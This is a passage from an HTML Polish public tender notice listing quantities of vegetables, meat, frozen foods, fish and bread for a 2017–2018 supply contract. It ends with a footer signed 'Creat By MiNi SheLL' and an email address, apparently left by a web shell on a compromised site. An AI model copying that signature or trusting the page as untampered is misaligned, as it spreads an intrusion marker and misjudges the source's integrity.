6.Cytryna-200 kg; 7.Czereśnia-500 kg; 8.Czosnek świeży-5 kg; 9.Fasola drobna-500 kg; 10.Groch połówki-500 kg; 11.Gruszka-3 800 kg; 12.Jabłko-4 900 kg; 13.Jaja-900 kg; 14.Kalafior-200 kg; 15.Kapusta biała-1 500 kg; 16.Kapusta biała młoda-400 kg; 17.Kapusta czerwona-1 000 kg; 18.Kapusta kiszona-1 000 kg; 19.Kapusta pekińska-500 kg; 20.Kapusta włoska-800 kg; 21.Kiwi-1 800 kg; 22.Koper-800 pęczków; 23.Mandarynka-1 500 kg; 24.Marchew-5 000 kg; 25.Nektarynka-1 200 kg; 26.Ogórek gruntowy-400 kg; 27.Ogórek kiszony-800 kg; 28.Ogórek małosolny-800 kg 29.Ogórek świeży-1 000 kg;30.Papryka-400 kg; 31.Pieczarka-900 kg; 32.Pietruszka-1 500 kg; 33.Pietruszka natka-500 pęczków; 34.Pomarańcza-2 000 kg; 35.Pomidor-1 000 kg; 36.Pomidor malinowy-500 kg; 37.Por-700 kg;38.Rzodkiew biała sopel ,,Agaty"-400 kg; 39.Rabarbar świeży-300 kg; 40.Rzodkiewka-800 pęczków; 41.Sałata-400 kg; 42.Seler-1 000 kg; 43.Szczypior-300 pęczków; 44.Śliwka-500 kg; 45.Truskawka-300 kg; 46.Winogrono jasne-600 kg; 47.Winogrono ciemne-600 kg; 48.Wiśnia-500 kg; 49.Ziemniak-30 000 kg; 50.Ziemniaki młode-4 000 kg.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15300000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-09-01<br/>data zakończenia: 2018-08-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Mięso i wyroby wędliniarskie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Antrykot wołowy schłodzona w temperaturze od 00 do 20 C-300 kg; 2.Boczek pieczony b/k-100 kg;3.Boczek świeży b/ż - mięso wieprzowe pochodzące z klas EUROP, barwa ciemnoróżowa, schłodzone w temperaturze od 00 do 40 C-400 kg; 4.Boczek wędzony-100 kg; 5.Filet z indyka- element uzyskany z tuszki indyka mięśnie piersiowe pozbawione skóry, kości i ścięgien, bez przebarwień i uszkodzeń mechanicznych schłodzone w temperaturze od -10C do 20C-1 000 kg; 6.Filet z kurczaka, piersi bez skóry- mięso uzyskane z tuszki kurcząt, mięśnie piersiowe, podwójne, pozbawione skóry, kości obojczyka, barwa i zapach charakterystyczny dla mięśni piersiowych, schłodzone w temperaturze od -10C do 20C-1 000 kg; 7.Gulasz wieprzowy - mięso z szynki pocięte w kawałki kwadratowe o wielkości od 2 do 3 cm pakowane w tacki próżniowe schłodzone w temperaturze od 00 do 40 C-1 500 kg; 8.Karkowina b/k- mięso wieprzowe pochodzące z klas EUROP, odcięta z odcinka szyjnego, główne mięśnie szyi i część mięśnia najdłuższego grzbietu, zapach swoisty dla mięsa świeżego wieprzowego schłodzone w temperaturze od 00 do 40 C-1 000 kg; 9.Kiełbasa biała parzona drobiowa zawierająca 80 procent drobiu nie krótsza niż 15 cm schłodzona w temperaturze od 00 do 40 C-500 kg;10.Kiełbasa biała surowa zawierająca 91 procent mięsa wieprzowego z łopatki i szynki nie krótsza niż 15 cm schłodzona w temperaturze od 00 do 40 C-500 kg; 11.Kiełbasa biała wieprzowa parzona zawierająca 80 procent mięsa z łopatki i szynki nie krótsza niż 15 cm schłodzone w temperaturze od 00 do 40 C-300 kg; 12.Kiełbasa podwawelska zawierająca 94 procent mięsa wieprzowego schłodzone w temperaturze od 10 do 60 C-500 kg; 13.Kiełbasa swojska zawierająca 90 procent mięsa wieprzowego, nie krótsza niż 15 cm schłodzone w temperaturze od 10 do 60 C-500 kg; 14.Kiełbasa toruńska zawierająca 80 procent mięsa wieprzowego schłodzone w temperaturze od 10 do 60 C-500 kg; 15.Kiełbasa złota grillowa zawierająca 75 procent mięsa wieprzowego schłodzone w temperaturze od 10 do 60 C-500 kg; 16.Kości wieprzowe karkowe schłodzone w temperaturze od -10C do 20C-200 kg; 17.Kości wieprzowe schabowe schłodzone w temperaturze od -10C do 20C-500 kg; 18.Kurczak świeży cały schłodzone w temperaturze od -10C do 20C-800 kg; 19.Krzyżówka świeża wieprzowa obrobiona schłodzone w temperaturze od -10C do 20C-500 kg 20.Łopatka wieprzowa b/k- mięso wieprzowe pochodzące z klas EUROP, bez fałdu skóry, główne mięśnie: nadgrzebieniowy, podgrzebieniowy, podłopatkowy, trójgłowy ramienny, zespół mięśni ramiennych, zapach swoisty dla mięsa świeżego wieprzowego schłodzona w temperaturze od 00 do 40 C -1 700 kg; 21.Łopatka wołowa b/k schłodzona w temperaturze od 00 do 40 C-400 kg; 22.Mięsień czterogłowy- mięso wieprzowe pochodzące z klas EUROP, schłodzona w temperaturze od 00 do 40 C-300 kg; 23.Mięso kl II wieprzowe- mięso wieprzowe pochodzące z klas EUROP, schłodzona w temperaturze od 00 do 40 C-1 000 kg; 24.Mięso mielone- mięso wieprzowe pochodzące z klas EUROP, schłodzona w temperaturze od 00 do 40 C-1 000 kg; 25.Mięso mielone wieprzowo- wołowe- schłodzone w temperaturze od 00 do 40 C-400 kg; 26.Parówki zawartość mięsa wieprzowego 80 procent-600 kg; 27.Parówki zawartość mięsa wieprzowego 93 procent-500 kg; 28.Podudzie z kurczaka ze stawem skokowym-300 kg;29.Porcje rosołowe-150 kg; 30.Rozbratel wołowy schłodzona w temperaturze od 00 do 40 C-200 kg; 31.Rostbef wołowy schłodzona w temperaturze od 00 do 40 C-200 kg; 32.Rumsztyk wołowy schłodzona w temperaturze od 00 do 40 C-200 kg; 33.Schab wieprzowy b/k- mięso wieprzowe pochodzące z klas EUROP odcinek piersiowo- lędźwiowy bez słoniny, mięsień najdłuższy grzbietu, wielodzielny, kolczysty i lędźwiowy większy, barwa jasno do ciemnoróżowej, zapach swoisty dla mięsa świeżego wieprzowego schłodzona w temperaturze od 00 do 40 C-1 800 kg; 34.Szynka wieprzowa kl. I b/k (bitki)- mięso wieprzowe pochodzące z klas EUROP schłodzone w temperaturze od 00 do 40 C-1 000 kg; 35.Szynka wieprzowa kl. II b/k (gulasz)- mięso wieprzowe pochodzące z klas EUROP schłodzone w temperaturze od 00 do 40 C-500 kg; 36.Szynka wieprzowa kl. III b/k (kotlet mielony)- mięso wieprzowe pochodzące z klas EUROP schłodzone w temperaturze od 00 do 40 C-500 kg; 37.Udziec wołowy b/k schłodzona w temperaturze od 00 do 40 C-400 kg; 38.Udziec z kurczaka świeży ze skórą i kością schłodzony w temperaturze od 00 do 40 C-1 000 kg; 39.Wątróbka drobiowa- podroby drobiowe schłodzony w temperaturze od 00 do 40 C-200 kg; 40.Wątroba wieprzowa- podroby z mięsa wieprzowego pochodzącego z klas EUROP, składa się z czterech płatów oddzielonych od siebie trzema głębokimi wcięciami, struktura nieznacznie ziarnista, powierzchnia głęboka, lekko błyszcząca i wilgotna, barwa brązowo- wiśniowa schłodzona w temperaturze od 00 do 30 C-200 kg; 41.Żeberka wp pasy- główne mięśnie międzyżebrowe wewnętrzne i zewnętrzne-100 kg; 42.Żołądki drobiowe- schłodzony w temperaturze od 00 do 40 C-200 kg;<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15110000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-09-01<br/>data zakończenia: 2018-08-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Mrożonki i ryby</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Brokuł nie mniejszy niż 450g-500 szt.; 2.Fasolka szparagowa zielona nie mniejsza niż 450g-200 szt.; 3.Fasolka szparagowa żółta nie mniejsza niż 450g-200 szt.; 4.Filet z mintaja bez glazury-200 kg; 5.Filet z dorsza biały bez glazury-500 kg; 6.Filet z dorsza czarniak bez glazury-500kg; 7.Filet z miruna bez glazury ze skórą-1 000 kg; 8.Filet z miruny bez glazury bez skóry-1 000kg;9.Filet z morszczuka bez glazury-400 kg; 10.Filet z tilapii bez glazury-500 kg; 11.Filet z ryby zapiekany z serem-300 kg; 12.Filet z ryby zapiekany ze szpinakiem-300 kg.; 13.Frytka karbowana nie mniejsza niż 2,5 kg-500 szt.; 14.Groszek zielony mrożony-200 kg; 15.Kalafior nie mniejszy niż 450g-200 szt.;16.Kartacze- zawartość nadzienia: mięso wieprzowe 14%, mięso wołowe 1,6%-700 kg; 17.Knedle owocowe, mrożone (opak. 0,45 - 3kg) - składniki: woda, płatki ziemniaczane (16%), truskawki (16%), skrobia ziemniaczana (14%), mąka pszenna, cukier, skrobie modyfikowane, sól, jaja w proszku.-400 kg;18.Kostka rybna panierowana składająca się z 90 procent ryby-400 kg; 19.Kotlet cordon bleu z indyka panierowany, smażony, mrożony 1 kg (wyrób garmażeryjny gotowy z mięsa rozdrobnionego z szynką z indyka i nadzieniem seropodobnym) skład kotleta: mięso z indyka 35%, panierka 16% ( mąka pszenna, skrobia pszenna, sól skrobia ziemniaczana, drożdże, przyprawy i ekstrakty przypraw), szynka z indyka 12% (mięso z indyka 61%, woda, sól, modyfikowana skrobia kukurydziana, sól, białko sojowe.-400 kg;20.Lody kubek, różne smaki-2 500 szt.; 21.Leczo nie mniejsze niż 450 g-300 szt.; 22.Łosoś filet mrożony-400 kg; 23.Mieszanka kompotowa nie mniejsza niż 450 kg- skład: śliwka z pestką, wiśnia z pestką, porzeczka, jabłko, aronia, rabarbar w różnych proporcjach.-400 szt.; 24.Mieszanka warzywna 7-składnikowa 450g-300 szt.; 25.Mieszanka warzywna 8-składnikowa 450g-300 szt.; 26.Naleśnik z serem 1 kg- farsz około 60% -400 kg; 27.Paluszki rybne z fileta ryby-600 kg; 28.Pierogi ruskie (opak. 0,5-2,5 kg)-400 kg; 29.Pierogi z kapustą i grzybami, mrożone-skład: mąka pszenna, kapusta kwaszona (19%), woda, kapusta biała (13%), pieczarki (3%), cebula, podgrzybek (1%), przyprawy, sól, olej roślinny, smalec wieprzowy, błonnik pszenny, suszone grzyby leśne (0,2%), cukier, skrobia modyfikowana, jaja w proszku, zawartość farszu 42%-300 kg; 30.Pierogi z truskawkami, mrożone- skład: Mąka pszenna, truskawki (31%), woda, cukier, skrobie modyfikowane, olej roślinny, jaja w proszku, sól, zawartość farszu 38%-300 kg; 31.Placki ziemniaczane zawierające 90% ziemniaka-300 kg;32.Pyzy z mięsem- skład: mąka pszenna, mięso wieprzowe (27%), woda, białko sojowe, cebula, mięso wołowe (2,8%), włoszczyzna (pietruszka, marchew, seler, por), błonnik pszenny, przyprawy, sól, olej roślinny, jaja w proszku, zawartość farszu 42%.-200 kg; 33.Pyzy ziemniaczane- skład: Woda, skrobia ziemniaczana (15%), płatki ziemniaczane (11%), grys ziemniaczany (10%), mąka pszenna, sól-200 kg; 34.Szpinak nie mniejszy niż 450g-300 szt; 35.Śledź solony typu matias-100 kg; 36.Śledź marynowany typu matias-100 kg; 37.Truskawka nie mniejsza niż 450g-300 szt.; 38.Wiśnia b/p nie mniejsza niż 450g-400 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15331170-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-09-01<br/>data zakończenia: 2018-08-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Pieczywo i wyroby cukiernicze</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b> 1.Bułka tarta 500g-500 kg; 2.Bułka słodka z budyniem 60g-2 000 szt.; 3.Bułka słodka z marmoladą 60g-2 000 szt.; 4.Bułka słodka z serem 60g-2 000 szt.; 5.Bułka zwykła 50g-3 000 szt.; 6.Chleb baltonowski 600g-3 000 szt.; 7.Chleb baltonowski 500g-2 500 szt.; 8.Chleb z dynią 400g-200 szt; 9.Chleb razowy 500g-400 szt.; 10.Chleb wileński 500g -200 szt.; 11.Chleb wieloziarnisty 500g-200 szt.; 12.Chleb z żurawiną 400g-200 szt.; 13.Pączek-2 000 szt.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>15810000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2017-09-01<br/>data zakończenia: 2018-08-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com